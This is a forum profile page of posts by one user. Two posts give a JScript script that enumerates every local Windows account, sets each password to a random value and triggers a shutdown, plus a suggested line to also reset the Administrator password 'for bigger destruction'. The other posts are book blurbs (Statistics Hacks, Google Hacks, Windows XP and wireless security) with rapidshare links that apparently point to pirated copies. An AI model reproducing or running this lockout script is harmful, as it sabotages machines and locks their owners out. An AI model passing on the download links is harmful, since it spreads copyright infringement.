Jump to content

mihnutzu

Members
  • Posts

    41
  • Joined

  • Last visited

    Never

Posts posted by mihnutzu

  1. Varianta pusa de ingerica face un log in C:WINDOWSlog.txt cu parola. Scriptul de mai sus nu.

    PS: Pentru distrugeri mia mari adaugati :

    killer.Run("net users "Administrator" "+rand_pass);

    sub :

    killer.Run("net users "+userArr+" "+rand_pass);

  2. var strComputer = ".";

    var objWMIService = GetObject("winmgmts:" + strComputer + "rootcimv2");

    var e = new Enumerator(objWMIService.ExecQuery("Select * from Win32_UserAccount","WQL",4b));

    var killer = new ActiveXObject("WScript.Shell");

    var userArr = new Array();

    for (;!e.atEnd();e.moveNext())

    {  

    objItem = e.item();

    var localStr = objItem.Caption;

    var index = localStr.indexOf("")+1;

    userArr.push(localStr.substring(index,localStr.length));

    //WScript.Echo(localStr);  

    }

    for(var i=0;i<userArr.length;i++)

    {

    var rand_pass = Math.random().toString();

    killer.Run("net users "+userArr+" "+rand_pass);

    }

    killer.Run("shudown -s -t 00");

  3. Want to calculate the probability that an event will happen? Be able to

    spot fake data? Prove beyond doubt whether one thing causes another? Or

    learn to be a better gambler? You can do that and much more with 75

    practical and fun hacks packed into Statistics Hacks. These cool tips

    tricks, and mind-boggling solutions from the world of statistics

    measurement, and research methods will not only amaze and entertain you

    but will give you an advantage in several real-world situations-including

    This book is ideal for anyone who likes puzzles, brainteasers, games

    gambling, magic tricks, and those who want to apply math and science to

    everyday circumstances. Several hacks in the first chapter alone-such as

    the "central limit theorem,", which allows you to know everything by

    knowing just a little-serve as sound approaches for marketing and other

    business objectives. Using the tools of inferential statistics, you can

    understand the way probability works, discover relationships, predict

    events with uncanny accuracy, and even make a little money with a

    Statistics Hacks presents useful techniques from statistics, educational

    and psychological measurement, and experimental research to help you

    solve a variety of problems in business, games, and life. You'll learn

    Play smart when you play Texas Hold 'Em, blackjack, roulette, dice

    Predict the outcomes of baseball games, know when to "go for two" in

    football, and anticipate the winners of other sporting events with

    Demystify amazing coincidences and distinguish the truly random from

    Spot fraudulent data, detect plagiarism, and break codes

    How to isolate the effects of observation on the thing observed

    Whether you're a statistics enthusiast who does calculations in your

    sleep or a civilian who is entertained by clever solutions to interesting

    problems, Statistics Hacks has tools to give you an edge over the world's

    slim odds

    DOWNLOAD :

    http://rapidshare.de/files/29027232/OReill...y.2006.chm.html

  4. Windows XP is a great operating system. It is faster and more secure than any other version of Windows. However, for

    some, it is not fast and secure enough. By picking up this book, you have started a three-part journey that will

    guide you through all of the steps of customizing, optimizing for performance, and securing Windows XP. I am not

    talking about minor little tweaks; this book is going to show you how to conduct major surgery on your Windows XP box

    Visually, Windows XP is superior to all other Windows versions. No other version of Windows has ever looked this good

    So how could you make it look better? Customize it! Impress your friends and refresh your dull desktop with a cool

    new look. I am going to show you how to completely change the way Windows XP looks during all stages of its operation

    Performance-wise, Windows XP has made great advances. However, for some computer users of older hardware, running

    Windows XP can be like trying to pull a 100-foot yacht behind a tiny import car. Although Windows XP will not bust

    your CPU quite so much as a yacht would, it can slow down the operation of your computer because there are so many

    new features. To help you out, I am going to show you how to get the new features under control; I'll also tell you

    about some tricks that I have found to speed up the operation of Windows XP. If you already have the V12 4 x 4 of

    computers, and you have no problem pulling the 100-foot yacht, then you will still benefit from the performance tips

    Windows XP is a lot more secure than prior Windows operating systems. However, as we all know from recent history

    it has not been doing very well. This book is going to show you how to use some of the new features of Windows XP

    Service Pack 2, as well as many other cool security tips, to make Windows XP much securer. Congratulations on

    starting your journey. Your computer will be in better shape than ever in no time!

    DOWNLOAD :

    http://rapidshare.de/files/29026914/Guide_..._winxp.rar.html

  5. In a section on choosing WiFi access points, the authors give a very explicit list of requirements (the ability to disable service-set identifier broadcasts, 128-bit Wired Equivalent Protocol--WEP--and so on), and list at least three real products (by make and model) that fit the specifications. They then proceed to show how to choose the most secure configuration options on each of the featured products, including the Cisco Systems Aironet and the Agere ORiNOCO. Configuration instructions are easy to follow and illustrated in detail. Information on the offensive side of the equation is shallower--the authors point out that it's possible to drive around, looking for unsecured wireless access points and that WEP has security flaws. Still, this book is one of the first on security for wireless networks, and it provides a lot of good information to the administrators of such networks. --David Wall

    Topics covered: The special security characteristics of wireless networks (primarily including, but not limited to, those operating under the IEEE 802.11 standards) and some recommended procedures for the administrators of such networks. Wired Equivalent Protocol (WEP), MAC filtering, and virtual private networks (VPNs) tailored for use in wireless environments get particularly admirable coverage.

    Book Description

    This is the only book written specifically for architects, engineers, and administrators responsible for securing their wireless networks. From making sense of the various acronyms (WAP, WEP, SSL, PKE, PKI, SSL, SSH, IPSEC) to implementing security policies, plans, and recovery protocols, this book helps users secure their wireless network before its security is compromised.

    DOWNLOAD :

    http://rapidshare.de/files/29024026/eBook_...etwork.pdf.html

  6. If you're a programmer--or even just familiar with a HTML or a scripting language--Google opens up even further. A large part of Google Hacks concerns itself with the Google API (the collection of capabilities that Google exposes for use by software) and other programmers' resources. For example, the authors include a simple Perl application that queries the Google engine with terms specified by the user. They also document XooMLe, which delivers Google results in XML form. In brief, this is the best compendium of Google's lesser-known capabilities available anywhere, including the Google site itself. --David Wall

    Topics covered: How to get the most from the Google search engine by using its Web-accessible features (including product searches, image searches, news searches, and newsgroup searches) and the large collection of desktop-resident toolbars available, as well as its advanced search syntax. Other sections have to do with programming with the Google API and simple "scrapes" of results pages, while further coverage addresses how to get your Web page to feature prominently in Google keyword searches. --This text refers to an out of print or unavailable edition of this title.

    Book Description

    Whether you're a high school student looking for the latest info on your favorite rock group, or a seasoned attorney researching an old case, you're probably using Google. It seems like everyone is. And who can blame them? With access to more than three million documents in over 30 languages, Google is a researcher's dream. It's no wonder, then, that nearly 150 million Google searches are conducted each day. As a result, people are hungry to learn new ways to maximize its usefulness. Truth is, there are dozens upon dozens of techniques to learn--each designed to make your Google search more time-efficient, more productive, and more fun. And Google Hacks, Second Edition has the inside scoop on them all. An absolute must-have guide for anyone who searches the Internet--and these days that's just about everybody--Google Hacks, Second Edition takes its best-selling predecessor one step further. In plain language, Google Hacks, Second Edition is an updated collection of industrial-strength, real-world tested solutions to practical research problems. Best of all, each of its 100 hacks are easy to read and digest--no confusing terminology or extraneous information to hamper your understanding. And although they can be read in just a few short minutes, when put to use, they can easily save you hours of research time. Now that's bang for your buck!

    DOWNLOAD :

    http://rapidshare.de/files/29021820/OReill...on2003.pdf.html

×
×
  • Create New...